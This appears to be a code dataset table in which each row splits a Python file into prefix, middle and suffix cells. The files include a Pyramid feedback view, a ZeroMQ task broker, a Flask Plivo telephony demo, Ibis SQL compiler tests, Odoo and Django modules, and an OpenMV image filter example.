| repo_name (string, 5–100 chars) | path (string, 4–231 chars) | language (string, 1 distinct value) | license (string, 15 distinct values) | size (int64, 6–947k) | score (float64, 0–0.34) | prefix (string, 0–8.16k chars) | middle (string, 3–512 chars) | suffix (string, 0–8.17k chars) |
|---|---|---|---|---|---|---|---|---|
richlanc/KaraKara | website/karakara/views/feedback.py | Python | gpl-3.0 | 1,173 | 0.004263 | from pyramid.view import view_config
from externals.lib.misc import strip_non_base_types
from externals.lib.log import log_event
from . import web, action_ok, action_error
from ..model import DBSession
from ..model.model_feedback import Feedback
import logging
log = logging.getLogger(__name__)
@view_config(route_name='feedback')
@web
def feedback_view(request):
"""
Feedback
"""
if request.method == 'GET':
if request.session.get('admin'):
log.info('admin viewed feedback')
return action_ok(data={'feedback': [feedback.to_dict() for feedback in DBSession.query(Feedback)]})
return action_ok()
if not request.params.get('details'):
raise action_error('Please provide feedback details', code=400)
feedback = Feedback()
for field, value in request.params.items():
try: setattr(feedback, field, value)
except Exception: pass
feedback.environ = strip_non_base_types(request.environ)
DBSession.add(feedback)
log.info('feedback - {0}'.format(request.params.get('details')))
log_event(request, **request.params)
return action_ok(message='Feedback received, thank you!')
|
IGITUGraz/scoop | scoop/broker/brokerzmq.py | Python | lgpl-3.0 | 15,234 | 0.001313 | #!/usr/bin/env python
#
# This file is part of Scalable COncurrent Operations in Python (SCOOP).
#
# SCOOP is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as
# published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# SCOOP is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with SCOOP. If not, see <http://www.gnu.org/licenses/>.
#
from collections import deque, defaultdict
import time
import zmq
import sys
import copy
import logging
try:
import cPickle as pickle
except ImportError:
import pickle
import scoop
from scoop import TIME_BETWEEN_PARTIALDEBUG, TASK_CHECK_INTERVAL
from .. import discovery, utils
from .structs import BrokerInfo
from .._comm.scoopmessages import *
class LaunchingError(Exception): pass
class Broker(object):
def __init__(self, tSock="tcp://*:*", mSock="tcp://*:*", debug=False,
headless=False, hostname="127.0.0.1"):
"""This function initializes a broker.
:param tSock: Task Socket Address.
Must contain protocol, address and port information.
:param mSock: Meta Socket Address.
Must contain protocol, address and port information.
"""
# Initialize zmq
self.context = zmq.Context(1)
self.debug = debug
self.hostname = hostname
# zmq Socket for the tasks, replies and request.
self.task_socket = self.context.socket(zmq.ROUTER)
self.task_socket.setsockopt(zmq.IPV4ONLY, 0)
self.task_socket.setsockopt(zmq.ROUTER_MANDATORY, 1)
self.task_socket.setsockopt(zmq.LINGER, 1000)
self.t_sock_port = 0
if tSock[-2:] == ":*":
self.t_sock_port = self.task_socket.bind_to_random_port(tSock[:-2])
else:
self.task_socket.bind(tSock)
self.t_sock_port = tSock.split(":")[-1]
# Create identifier for this broker
self.name = "{0}:{1}".format(hostname, self.t_sock_port)
# Initialize broker logging
self.logger = utils.initLogging(2 if debug else 0, name=self.name)
self.logger.handlers[0].setFormatter(
logging.Formatter(
"[%(asctime)-15s] %(module)-9s ({0}) %(levelname)-7s "
"%(message)s".format(self.name)
)
)
# zmq Socket for the pool informations
self.info_socket = self.context.socket(zmq.PUB)
self.info_socket.setsockopt(zmq.IPV4ONLY, 0)
self.info_socket.setsockopt(zmq.LINGER, 1000)
self.info_sock_port = 0
if mSock[-2:] == ":*":
self.info_sock_port = self.info_socket.bind_to_random_port(mSock[:-2])
else:
self.info_socket.bind(mSock)
self.info_sock_port = mSock.split(":")[-1]
self.task_socket.setsockopt(zmq.SNDHWM, 0)
self.task_socket.setsockopt(zmq.RCVHWM, 0)
self.info_socket.setsockopt(zmq.SNDHWM, 0)
self.info_socket.setsockopt(zmq.RCVHWM, 0)
# Init connection to fellow brokers
self.cluster_socket = self.context.socket(zmq.DEALER)
self.cluster_socket.setsockopt(zmq.IPV4ONLY, 0)
self.cluster_socket.setsockopt_string(zmq.IDENTITY, self.getName())
self.cluster_socket.setsockopt(zmq.RCVHWM, 0)
self.cluster_socket.setsockopt(zmq.SNDHWM, 0)
self.cluster_socket.setsockopt(zmq.IMMEDIATE, 1)
self.cluster = []
self.cluster_available = set()
# Init statistics
if self.debug:
self.stats = []
self.lastDebugTs = time.time()
# Two cases are important and must be optimised:
# - The search of unassigned task
# - The search of available workers
# These represent the cases in which the broker must handle the
# communications the fastest. In other cases, the broker isn't flooded with urgent messages.
# Initializing the queues of workers and tasks
# The busy workers variable will contain a dict (map) of workers: task
self.available_workers = set()
self.unassigned_tasks = deque()
self.assigned_tasks = defaultdict(set)
self.heartbeat_times = {}
self.init_time = time.time()
self.last_task_check_time = time.time()
# Shared variables containing {workerID:{varName:varVal},}
self.shared_variables = defaultdict(dict)
# Start a worker-like communication if needed
self.execQueue = None
# Handle cloud-like behavior
self.discovery_thread = None
self.config = defaultdict(bool)
self.processConfig({'headless': headless})
def addBrokerList(self, aBrokerInfoList):
"""Add a broker to the broker cluster available list.
Connects to the added broker if needed."""
self.cluster_available.update(set(aBrokerInfoList))
# If we need another connection to a fellow broker
# TODO: only connect to a given number
for aBrokerInfo in aBrokerInfoList:
self.cluster_socket.connect(
"tcp://{hostname}:{port}".format(
hostname=aBrokerInfo.hostname,
port=aBrokerInfo.task_port,
)
)
self.cluster.append(aBrokerInfo)
def processConfig(self, worker_config):
"""Update the pool configuration with a worker configuration.
"""
self.config['headless'] |= worker_config.get("headless", False)
if self.config['headless']:
# Launch discovery process
if not self.discovery_thread:
self.discovery_thread = discovery.Advertise(
port=",".join(str(a) for a in self.getPorts()),
)
def safeTaskSend(self, worker_address, task_id_pickled, task_pickled):
try:
self.task_socket.send_multipart([worker_address, TASK, task_pickled])
except zmq.ZMQError as E:
scoop.logger.warning("Failed to deliver task {0} to address {1}".format(pickle.loads(task_id_pickled), worker_address))
self.unassigned_tasks.append((task_id_pickled, task_pickled))
else:
self.logger.debug("Sent {0} to worker {1}".format(pickle.loads(task_id_pickled), worker_address))
self.assigned_tasks[worker_address].add(task_id_pickled)
def run(self):
"""Redirects messages until a shutdown message is received."""
while True:
if not self.task_socket.poll(-1):
continue
msg = self.task_socket.recv_multipart()
msg_type = msg[1]
# Checking if things are fine with servers and futures
if time.time() - self.last_task_check_time > TASK_CHECK_INTERVAL:
self.last_task_check_time = time.time()
self.checkAssignedTasks()
if self.debug:
self.stats.append((time.time(),
msg_type,
len(self.unassigned_tasks),
len(self.available_workers)))
if time.time() - self.lastDebugTs > TIME_BETWEEN_PARTIALDEBUG:
self.writeDebug("debug/partial-{0}".format(
round(time.time(), -1)
))
self.lastDebugTs = time.time()
# New task inbound
if msg_type == TASK:
task_id = msg[2]
task = msg[3]
self.logger.debug("Received task {0}".format(task_id))
try:
address = self.available_workers.pop()
except KeyError:
self.unassigned_tasks.append((task_id, task))
else:
self.safeTaskSend(address, ta |
kmichal2/plivo | app.py | Python | mit | 7,016 | 0.007127 | import os
from flask import Flask, Response, request, url_for
import psycopg2
import urlparse
import plivo
import plivoxml
AUTH_ID = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
AUTH_TOKEN = 'YYYYYYYYYYYYYYYYYYYYYYYYYYYYYYYY'
CALLER_ID = '+12345678901'
BOX_ID = '+12345678901'
MY_URL = 'http://morning-ocean-4669.herokuapp.com/report/'
app = Flask(__name__)
@app.route('/response/speak/', methods=['GET'])
def speak():
# Enter the message you want to play
text = "Congratulations! You just made a text to speech app on Plivo cloud!"
parameters = {'loop': 1, 'language': "en-US", 'voice': "WOMAN"}
response = plivoxml.Response()
response.addSpeak(text, **parameters)
return Response(str(response), mimetype='text/xml')
@app.route('/send', methods=['GET', 'POST'])
def send():
# Enter the message you want to send
auth_id = os.environ.get("AUTH_ID", AUTH_ID)
auth_token = os.environ.get("AUTH_TOKEN", AUTH_TOKEN)
caller_id = os.environ.get("CALLER_ID", CALLER_ID)
box_id = os.environ.get("BOX_ID", BOX_ID)
my_url = os.environ.get("MY_URL", MY_URL)
params = {
'src': caller_id, # Sender's phone number with country code
'dst' : box_id, # Receiver's phone Number with country code
'text' : u"Hello, how are you?", # Your SMS Text Message - English
'url' : my_url, # The URL to which with the status of the message is sent
'method' : 'POST' # The method used to call the url
}
if request.method == 'GET':
response = plivoxml.Response()
#response.addSpeak(auth_id + auth_token + caller_id + box_id + my_url)
elif request.method == 'POST':
p = plivo.RestAPI(auth_id, auth_token)
response = p.send_message(params)
return Response(str(response), mimetype='text/xml')
@app.route('/call', methods=['GET', 'POST'])
def call():
# Enter the message you want to send
auth_id = os.environ.get("AUTH_ID", AUTH_ID)
auth_token = os.environ.get("AUTH_TOKEN", AUTH_TOKEN)
caller_id = os.environ.get("CALLER_ID", CALLER_ID)
box_id = os.environ.get("BOX_ID", BOX_ID)
my_url = os.environ.get("MY_URL", MY_URL)
client = request.values.get('client')
params = {
'from': caller_id, # Caller Id
'to' : box_id, # User Number to Call
'answer_url' : my_url+"call",
'time_limit': 80
}
if request.method == 'GET':
response = plivoxml.Response()
response.addSpeak("hello "+client)
#response.addSpeak(auth_id + auth_token + caller_id + box_id + my_url)
#p = plivo.RestAPI(auth_id, auth_token)
#response = p.make_call(params)
elif request.method == 'POST':
response = plivoxml.Response()
response.addSpeak("hello "+client)
#p = plivo.RestAPI(auth_id, auth_token)
#response = p.make_call(params)
return Response(str(response), mimetype='text/xml')
@app.route("/initdb", methods=['GET', 'POST'])
def initdb():
response = plivoxml.Response()
client = request.values.get('client')
if client == None:
return Response(str(response), mimetype='text/xml')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor()
try:
cur.execute("CREATE TABLE IF NOT EXISTS test (id serial PRIMARY KEY, num integer, data varchar);")
cur.execute("INSERT INTO test (num, data) VALUES (%s, %s)", (100, "abc'def"))
cur.execute("SELECT * FROM test;")
response.addSpeak(cur.fetchone())
except Exception, e:
response.addSpeak(e)
cur.close()
conn.commit()
conn.close()
return Response(str(response), mimetype='text/xml')
@app.route("/writedb", methods=['GET', 'POST'])
def writedb():
response = plivoxml.Response()
client = request.values.get('client')
text = request.values.get('text')
if client == None:
return Response(str(response), mimetype='text/xml')
if text == None:
return Response(str(response), mimetype='text/xml')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor()
#cur.execute("UPDATE test SET data = 'abcd' WHERE num = 100;")
try:
SQL = "UPDATE test SET data = %s WHERE num = 100;"
data = (""+text+"",)
cur.execute(SQL, data)
cur.execute("SELECT * FROM test;")
response.addSpeak(cur.fetchone())
except Exception, e:
response.addSpeak(e)
cur.close()
conn.commit()
conn.close()
return Response(str(response), mimetype='text/xml')
@app.route("/readdb", methods=['GET', 'POST'])
def readdb():
response = plivoxml.Response()
client = request.values.get('client')
if client == None:
return Response(str(response), mimetype='text/xml')
urlparse.uses_netloc.append("postgres")
url = urlparse.urlparse(os.environ["DATABASE_URL"])
conn = psycopg2.connect(
database=url.path[1:],
user=url.username,
password=url.password,
host=url.hostname,
port=url.port
)
cur = conn.cursor()
try:
cur.execute("SELECT * FROM test;")
response.addSpeak(cur.fetchone())
except Exception, e:
response.addSpeak(e)
cur.close()
conn.close()
return Response(str(response), mimetype='text/xml')
@app.route("/writefile", methods=['GET', 'POST'])
def writefile():
response = plivoxml.Response()
client = request.values.get('client')
try:
file = open("/tmp/foo.txt", "w")
file.write('this is a line of text')
file.close()
read_file = open("/tmp/foo.txt", 'r')
text = read_file.read()
read_file.close()
response.addSpeak(text)
except Exception, e:
response.addSpeak(e)
return Response(str(response), mimetype='text/xml')
@app.route("/readfile", methods=['GET', 'POST'])
def readfile():
response = plivoxml.Response()
client = request.values.get('client')
try:
read_file = open("/tmp/foo.txt", 'r')
text = read_file.read()
read_file.close()
response.addSpeak(text)
except Exception, e:
response.addSpeak(e)
return Response(str(response), mimetype='text/xml')
@app.route("/hello", methods=['GET', 'POST'])
def hello():
response = plivoxml.Response()
client = request.values.get('client')
response.addSpeak("hello "+client)
return Response(str(response), mimetype='text/xml')
if __name__ == '__main__':
port = int(os.environ.get('PORT', 5000))
app.run(host='0.0.0.0', port=port)
|
dekom/threepress-bookworm-read-only | bookworm/gdata/tests/all_tests_coverage.py | Python | bsd-3-clause | 1,805 | 0.00554 | #!/usr/bin/env python
#
# Copyright (C) 2009 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# This module is used for version 2 of the Google Data APIs.
__author__ = 'j.s@google.com (Jeff Scudder)'
import unittest
import coverage
import all_tests
import atom.core
import atom.http_core
import atom.mock_http_core
import atom.auth
import atom.client
import gdata.gauth
import gdata.client
import gdata.data
import gdata.blogger.data
import gdata.blogger.client
import gdata.maps.data
import gdata.maps.client
import gdata.spreadsheets.data
from gdata.test_config import settings
# Ensure that coverage tests execute the live requests to the servers, but
# allow use of cached server responses to speed up repeated runs.
settings.RUN_LIVE_TESTS = True
settings.CLEAR_CACHE = False
def suite():
return unittest.TestSuite((atom_tests.core_test.suite(),))
if __name__ == '__main__':
coverage.erase()
coverage.start()
unittest.TextTestRunner().run(all_tests.suite())
coverage.stop()
coverage.report([atom.core, atom.http_core, atom.auth, atom.data,
atom.mock_http_core, atom.client, gdata.gauth, gdata.client,
gdata.core, gdata.data, gdata.blogger.data, gdata.blogger.client,
gdata.maps.data, gdata.maps.client, gdata.spreadsheets.data])
|
UdK-VPT/Open_eQuarter | mole/extensions/acqu_berlin/fbinter_wfs_floors_alkis.py | Python | gpl-2.0 | 1,594 | 0.00941 | # -*- coding: utf-8 -*-
from qgis.core import NULL
from mole.project import config
from PyQt4.QtCore import QVariant
def load(self=None):
self.load_wfs()
return True
def evaluation(self=None, parameters={},feature=None):
from mole import oeq_global
result = {'FLOORS': {'type': QVariant.Double,
'value': 3.5}}
if bool(parameters['FLRS_ALK']):
result['FLOORS']['value'] = parameters['FLRS_ALK']
return result
import os
from mole.extensions import OeQExtension
from mole.project import config
extension = OeQExtension(
extension_id=__name__,
category='Import',
subcategory='WFS',
extension_name='Floors (ALKIS, WFS)',
extension_type='information',
field_id='', #used for point sampling tool
par_in=['FLRS_ALK', 'BSMTS_ALK'], #config.building_id_key,
#field_rename= {"AnzahlDerO" : "FLRS_ALK", "AnzahlDerU" : "BSMTS_ALK"},
source_type='wfs',
layer_name='Floors (WFS Capture)',
sourcelayer_name='Floors (WFS Capture)',
targetlayer_name=config.data_layer_name,
active=False,
description=u'',
#source='http://fbinter.stadt-berlin.de/fb/wfs/geometry/senstadt/re_alkis_gebaeude?SERVICE=WFS&VERSION=1.0.0&REQUEST=GetFeature&TYPENAME=fis:re_alkis_gebaeude&SRSNAME=EPSG:25833',
source_crs='EPSG:25833',
extension_filepath=os.path.join(__file__),
colortable = os.path.join(os.path.splitext(__file__)[0] + '.qml'),
load_method=load,
preflight_method=None,
evaluation_method=evaluation,
postflight_method=None)
extension.registerExtension(default=True)
|
openmv/openmv | scripts/examples/OpenMV/04-Image-Filters/grayscale_bilateral_filter.py | Python | mit | 1,399 | 0.009292 | # Grayscale Bilteral Filter Example
#
# This example shows off using the bilateral filter on grayscale images.
import sensor, image, time
sensor.reset() # Initialize the camera sensor.
sensor.set_pixformat(sensor.GRAYSCALE) # or sensor.RGB565
sensor.set_framesize(sensor.QQVGA) # or sensor.QVGA (or others)
sensor.skip_frames(time = 2000) # Let new settings take effect.
clock = time.clock() # Tracks FPS.
while(True):
clock.tick() # Track elapsed milliseconds between snapshots().
img = sensor.snapshot() # Take a picture and return the image.
# color_sigma controls how close color-wise pixels have to be to each other to be
# blurred together. A smaller value means they have to be closer.
# A larger value is less strict.
# space_sigma controls how close space-wise pixels have to be to each other to be
# blurred together. A smaller value means they have to be closer.
# A larger value is less strict.
# Run the kernel on every pixel of the image.
img.bilateral(3, color_sigma=0.1, space_sigma=1)
# Note that the bilateral filter can introduce image defects if you set
# color_sigma/space_sigma too aggressively. Increase the sigma values until
# the defects go away if you see them.
print(clock.fps()) # Note: Your OpenMV Cam runs about half as fast while
# connected to your computer. The FPS should increase once disconnected.
|
sostenibilidad-unam/posgrado | posgradmin/posgradmin/migrations/0040_auto_20191120_2258.py | Python | gpl-3.0 | 484 | 0.002066 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.13 on 2019-11-21 04:58
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('posgradmin', '0039_auto_20191120_2249'),
]
operations = [
migrations.AlterModelOptions(
name='profesor',
options={'ordering': ['user__first_name', 'user__last_name'], 'verbose_name_plural': 'Profesores'},
),
]
|
jeffery9/mixprint_addons | ineco_kpi/crm_lead.py | Python | agpl-3.0 | 1,871 | 0.003741 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from base_status.base_stage import base_stage
import crm
from datetime import datetime
from dateutil.relativedelta import relativedelta
from osv import fields, osv
import time
import tools
from tools.translate import _
from tools import html2plaintext
from base.res.res_partner import format_address
class crm_lead(osv.osv):
_description = "Lead/Opportunity"
_inherit = "crm.lead"
def create(self, cr, uid, vals, context=None):
if 'date_deadline' not in vals:
date_ref = datetime.now().strftime('%Y-%m-%d')
next_date = (datetime.strptime(date_ref, '%Y-%m-%d') + relativedelta(days=30))
vals.update({'date_deadline': next_date.strftime('%Y-%m-%d')})
return super(crm_lead, self).create(cr, uid, vals, context)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
equitania/myodoo-addons-v10 | eq_website_quote/__init__.py | Python | agpl-3.0 | 1,002 | 0 | # -*- coding: utf-8 -*-
##############################################################################
#
# Odoo Addon, Open Source Management Solution
# Copyright (C) 2014-now Equitania Software GmbH(<http://www.equitania.de>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
|
cpcloud/ibis | ibis/tests/sql/test_select_sql.py | Python | apache-2.0 | 33,419 | 0 | import pytest
import ibis
from ibis.backends.base.sql.compiler import Compiler
from .conftest import get_query
def test_nameless_table():
# Generate a unique table name when we haven't passed on
nameless = ibis.table([('key', 'string')])
assert Compiler.to_sql(nameless) == 'SELECT *\nFROM {}'.format(
nameless.op().name
)
with_name = ibis.table([('key', 'string')], name='baz')
result = Compiler.to_sql(with_name)
assert result == 'SELECT *\nFROM baz'
def test_physical_table_reference_translate(alltypes):
result = Compiler.to_sql(alltypes)
expected = "SELECT *\nFROM alltypes"
assert result == expected
def test_simple_joins(star1, star2):
t1 = star1
t2 = star2
pred = t1['foo_id'] == t2['foo_id']
pred2 = t1['bar_id'] == t2['foo_id']
cases = [
(
t1.inner_join(t2, [pred])[[t1]],
"""SELECT t0.*
FROM star1 t0
INNER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`""",
),
(
t1.left_join(t2, [pred])[[t1]],
"""SELECT t0.*
FROM star1 t0
LEFT OUTER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`""",
),
(
t1.outer_join(t2, [pred])[[t1]],
"""SELECT t0.*
FROM star1 t0
FULL OUTER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`""",
),
# multiple predicates
(
t1.inner_join(t2, [pred, pred2])[[t1]],
"""SELECT t0.*
FROM star1 t0
INNER JOIN star2 t1
ON (t0.`foo_id` = t1.`foo_id`) AND
(t0.`bar_id` = t1.`foo_id`)""",
),
]
for expr, expected_sql in cases:
result_sql = Compiler.to_sql(expr)
assert result_sql == expected_sql
def test_multiple_joins(multiple_joins):
what = multiple_joins
result = Compiler.to_sql(what)
expected = """\
SELECT *, `value1`, t1.`value2`
FROM (
SELECT t2.`c`, t2.`f`, t2.`foo_id` AS `foo_id_x`, t2.`bar_id`,
t3.`foo_id` AS `foo_id_y`, t3.`value1`, t3.`value3`
FROM star1 t2
LEFT OUTER JOIN star2 t3
ON t2.`foo_id` = t3.`foo_id`
) t0
INNER JOIN star3 t1
ON `bar_id` = t1.`bar_id`"""
assert result == expected
def test_join_between_joins(join_between_joins):
projected = join_between_joins
result = Compiler.to_sql(projected)
expected = """\
SELECT t0.*, t1.`value3`, t1.`value4`
FROM (
SELECT t2.*, t3.`value2`
FROM `first` t2
INNER JOIN second t3
ON t2.`key1` = t3.`key1`
) t0
INNER JOIN (
SELECT t2.*, t3.`value4`
FROM third t2
INNER JOIN fourth t3
ON t2.`key3` = t3.`key3`
) t1
ON t0.`key2` = t1.`key2`"""
assert result == expected
def test_join_just_materialized(join_just_materialized):
joined = join_just_materialized
result = Compiler.to_sql(joined)
expected = """SELECT *
FROM tpch_nation t0
INNER JOIN tpch_region t1
ON t0.`n_regionkey` = t1.`r_regionkey`
INNER JOIN tpch_customer t2
ON t0.`n_nationkey` = t2.`c_nationkey`"""
assert result == expected
result = Compiler.to_sql(joined)
assert result == expected
def test_semi_anti_joins(semi_anti_joins):
sj, aj = semi_anti_joins
result = Compiler.to_sql(sj)
expected = """SELECT t0.*
FROM star1 t0
LEFT SEMI JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`"""
assert result == expected
result = Compiler.to_sql(aj)
expected = """SELECT t0.*
FROM star1 t0
LEFT ANTI JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`"""
assert result == expected
def test_self_reference_simple(self_reference_simple):
expr = self_reference_simple
result_sql = Compiler.to_sql(expr)
expected_sql = "SELECT *\nFROM star1"
assert result_sql == expected_sql
def test_join_self_reference(self_reference_join):
result = self_reference_join
result_sql = Compiler.to_sql(result)
expected_sql = """SELECT t0.*
FROM star1 t0
INNER JOIN star1 t1
ON t0.`foo_id` = t1.`bar_id`"""
assert result_sql == expected_sql
def test_join_projection_subquery_broken_alias(join_projection_subquery_bug):
expr = join_projection_subquery_bug
result = Compiler.to_sql(expr)
expected = """SELECT t1.*, t0.*
FROM (
SELECT t2.`n_nationkey`, t2.`n_name` AS `nation`, t3.`r_name` AS `region`
FROM tpch_nation t2
INNER JOIN tpch_region t3
ON t2.`n_regionkey` = t3.`r_regionkey`
) t0
INNER JOIN tpch_customer t1
ON t0.`n_nationkey` = t1.`c_nationkey`"""
assert result == expected
def test_where_simple_comparisons(where_simple_comparisons):
what = where_simple_comparisons
result = Compiler.to_sql(what)
expected = """SELECT *
FROM star1
WHERE (`f` > 0) AND
(`c` < (`f` * 2))"""
assert result == expected
def test_where_with_join(where_with_join):
e1 = where_with_join
expected_sql = """SELECT t0.*, t1.`value1`, t1.`value3`
FROM star1 t0
INNER JOIN star2 t1
ON t0.`foo_id` = t1.`foo_id`
WHERE (t0.`f` > 0) AND
(t1.`value3` < 1000)"""
result_sql = Compiler.to_sql(e1)
assert result_sql == expected_sql
def test_where_no_pushdown_possible(star1, star2):
t1 = star1
t2 = star2
joined = t1.inner_join(t2, [t1.foo_id == t2.foo_id])[
t1, (t1.f - t2.value1).name('diff')
]
filtered = joined[joined.diff > 1]
expected_sql = """\
SELECT t0.*
FROM (
SELECT t1.*, t1.`f` - t2.`value1` AS `diff`
FROM star1 t1
INNER JOIN star2 t2
ON t1.`foo_id` = t2.`foo_id`
) t0
WHERE t0.`diff` > 1"""
result_sql = Compiler.to_sql(filtered)
assert result_sql == expected_sql
def test_where_with_between(alltypes):
t = alltypes
what = t.filter([t.a > 0, t.f.between(0, 1)])
result = Compiler.to_sql(what)
expected = """SELECT *
FROM alltypes
WHERE (`a` > 0) AND
(`f` BETWEEN 0 AND 1)"""
assert result == expected
def test_where_analyze_scalar_op(functional_alltypes):
# root cause of #310
table = functional_alltypes
expr = table.filter(
[
table.timestamp_col
< (ibis.timestamp('2010-01-01') + ibis.interval(months=3)),
table.timestamp_col < (ibis.now() + ibis.interval(days=10)),
]
).count()
result = Compiler.to_sql(expr)
expected = """\
SELECT count(*) AS `count`
FROM functional_alltypes
WHERE (`timestamp_col` < date_add(cast({} as timestamp), INTERVAL 3 MONTH)) AND
(`timestamp_col` < date_add(cast(now() as timestamp), INTERVAL 10 DAY))""" # noqa: E501
assert result == expected.format("'2010-01-01 00:00:00'")
def test_bug_duplicated_where(airlines):
# GH #539
table = airlines
t = table['arrdelay', 'dest']
expr = t.group_by('dest').mutate(
dest_avg=t.arrdelay.mean(), dev=t.arrdelay - t.arrdelay.mean()
)
tmp1 = expr[expr.dev.notnull()]
tmp2 = tmp1.sort_by(ibis.desc('dev'))
worst = tmp2.limit(10)
result = Compiler.to_sql(worst)
expected = """\
SELECT *
FROM (
SELECT t1.*
FROM (
SELECT *, avg(`arrdelay`) OVER (PARTITION BY `dest`) AS `dest_avg`,
`arrdelay` - avg(`arrdelay`) OVER (PARTITION BY `dest`) AS `dev`
FROM (
SELECT `arrdelay`, `dest`
FROM airlines
) t3
) t1
WHERE t1.`dev` IS NOT NULL
) t0
ORDER BY `dev` DESC
LIMIT 10"""
assert result == expected
@pytest.mark.parametrize(
("expr_fn", "expected"),
[
pytest.param(
lambda t: t.aggregate([t['f'].sum().name('total')], [t['foo_id']]),
"""SELECT `foo_id`, sum(`f`) AS `total`
FROM star1
GROUP BY 1""",
id="explicit_column",
),
pytest.param(
lambda t: t.aggregate(
[t['f'].sum().name('total')], ['foo_id', 'bar_id']
),
"""SELECT `foo_id`, `bar_id`, sum(`f`) AS `total`
FROM star1
GROUP BY 1, 2""",
id="string_columns",
),
],
)
def test_simple_aggregate_query(star1, expr_fn, expected):
expr = expr_fn(star1)
result = Compiler.to_sql(expr)
assert result == expected
def test_aggregate_having(aggregate_having):
e1, e2 = aggregate_having
result = Compiler.to_sql(e1)
expected = """SELECT `foo_id`, sum(`f`) AS `total`
FROM star1
GROUP BY 1
HAVING sum(` |
openstack/python-zaqarclient | zaqarclient/queues/v1/message.py | Python | apache-2.0 | 2,204 | 0 | # Copyright (c) 2013 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implements a message controller that understands Zaqar messages."""
from zaqarclient.queues.v1 import core
class Message(object):
"""A handler for Zaqar server Message resources.
Attributes are only downloaded once - at creation time.
"""
def __init__(self, queue, ttl, age, body, href=None, id=None,
claim_id=None, claim_count=0, checksum=None):
self.queue = queue
self.href = href
self.ttl = ttl
self.age = age
self.body = body
self.claim_count = claim_count
self.checksum = checksum
# NOTE(flaper87): Is this really
# necessary? Should this be returned
# by Zaqar?
# The url has two forms depending on if it has been claimed.
# /v1/queues/worker-jobs/messages/5c6939a8?claim_id=63c9a592
# or
# /v1/queues/worker-jobs/messages/5c6939a8
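# For illustration (the example hrefs above are simply the two shapes
# the parsing below has to handle): the claimed form yields id
# '5c6939a8' and claim_id '63c9a592'; the unclaimed form yields id
# '5c6939a8' and claim_id None.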
if id is None:
self._id = href.split('/')[-1]
if '?' in self._id:
self._id = self._id.split('?')[0]
else:
self._id = id
def __repr__(self):
return '<Message id:{id} ttl:{ttl}>'.format(id=self._id,
ttl=self.ttl)
@property
def claim_id(self):
if '=' in self.href:
return self.href.split('=')[-1]
def delete(self):
req, trans = self.queue.client._request_and_transport()
core.message_delete(trans, req, self.queue._name,
self._id, self.claim_id)
def create_object(parent):
return lambda args: Message(parent, **args)
|
joferkington/numpy | numpy/core/tests/test_multiarray.py | Python | bsd-3-clause | 242,380 | 0.000772 | from __future__ import division, absolute_import, print_function
import collections
import tempfile
import sys
import shutil
import warnings
import operator
import io
import itertools
import ctypes
import os
if sys.version_info[0] >= 3:
import builtins
else:
import __builtin__ as builtins
from decimal import Decimal
import numpy as np
from numpy.compat import asbytes, getexception, strchar, unicode, sixu
from test_print import in_foreign_locale
from numpy.core.multiarray_tests import (
test_neighborhood_iterator, test_neighborhood_iterator_oob,
test_pydatamem_seteventhook_start, test_pydatamem_seteventhook_end,
test_inplace_increment, get_buffer_info, test_as_c_array,
)
from numpy.testing import (
TestCase, run_module_suite, assert_, assert_raises,
assert_equal, assert_almost_equal, assert_array_equal,
assert_array_almost_equal, assert_allclose,
